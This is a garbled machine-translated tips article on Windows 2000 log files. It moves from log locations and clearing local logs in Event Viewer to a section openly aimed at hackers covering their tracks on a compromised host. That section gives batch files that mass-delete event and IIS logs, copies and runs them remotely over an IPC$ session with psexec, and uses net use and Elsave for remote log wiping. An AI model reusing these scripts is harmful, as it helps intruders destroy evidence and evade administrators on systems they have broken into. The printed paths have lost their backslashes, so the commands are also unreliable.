Method of clearing system log with batch file _ Application Tips

What is a log file? It is a collection of file systems that depend on the log files of the various data that are established. When any system crashes or needs to be restarted, the data is restored in accordance with the records of the information in the log file intact. The role of the log for system security is obvious, whether the network administrator or hackers are very attached importance to the log, an experienced administrator is often able to quickly through the log to understand the security performance of the system, and a smart hacker will quickly after the invasion of the successful removal of their own bad log. Whether it is attack or defense, the importance of the log is evident. Let's briefly discuss how to clear the log file.
The location of the log file

Windows 2000 system log files have application logs, security logs, system logs, DNS server logs, and so on, application log, security log, System log, DNS log default location:%systemroot%system32config.

Security log files:%systemroot%system32configsecevent.evt

System log File:%systemroot%system32configsysevent.evt

Application log file:%systemroot%system32configappevent.evt

Some administrators are likely to relocate these logs (so the logs may not be in those locations above), where EventLog has a number of child tables, which can be found in the above log directory.

Second, the elimination of their own computer log

If you want to clear the log on your computer, you can log on to Windows as an administrator, then enter Administrative tools in Control Panel, and then double-click Event Viewer. Once opened, we can clear the log file here, with application, security, and system log files. For example, if you want to clear the security log, you can right-click on the "Security log" and choose "Properties" from the pop-up menu. Next in the pop-up dialog box, click the "Clear Log" button can be cleared, if you want to clear these logs later, you can "overwrite size as needed", so that you can achieve the maximum log size when the event is overwritten, will not prompt you to clear the log.

Third, clear the log on the remote host

In most cases, the IIS log will faithfully record any requests it receives (and special attacks that are not logged by IIS), a good system administrator can use this to discover an intrusion attempt to protect his system. So if you're a hacker, the first thing after the invasion system success is to clear the log, wipe off their own traces, at this time can be used in the following two ways: one is to write their own batch file to solve, write a batch processing can clear the log is very simple, the method is: a new batch with the following file:

@del C:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del C:winntsystem32dtclog*.*

@del C:winntsystem32*.log

@del C:winntsystem32*.txt

@del C:winnt*.txt

@del C:winnt*.log

@del C:del.bat

Save the above content as Del.bat standby. In the above code, ECHO is a DOS echoing command, preceded by the "@" prefix character, which means that the line is not displayed in the command-line or DOS while executing, and the DEL command must be clear. It is the delete file command.

Next, create a new batch file that reads as follows:

@copy del.bat\%1c$

@echo Copy the Del.bat to the broiler ... Ok

@psexec \%1 C:del.bat

@echo Run Del.bat on the broiler, clear the log file ... Ok

Save for Clean.bat, assuming that the IPC has been connected with the broiler, and then entered under CMD: Clean.bat broiler IP, you can clear the log file on the broiler.

Another way to clear the log is the use of Third-party software, such as the famous hacker software streamer developer Hacker Elsave.exe, is a remote system log, application log, security log software, you can download online. Elsave.exe is easy to use, first using the Administrator account to establish an IPC session with the other: Net Use\ip pass/user:user, and then execute the following command at the command line: Elsave-s\ip-l application-c, This deletes the security log.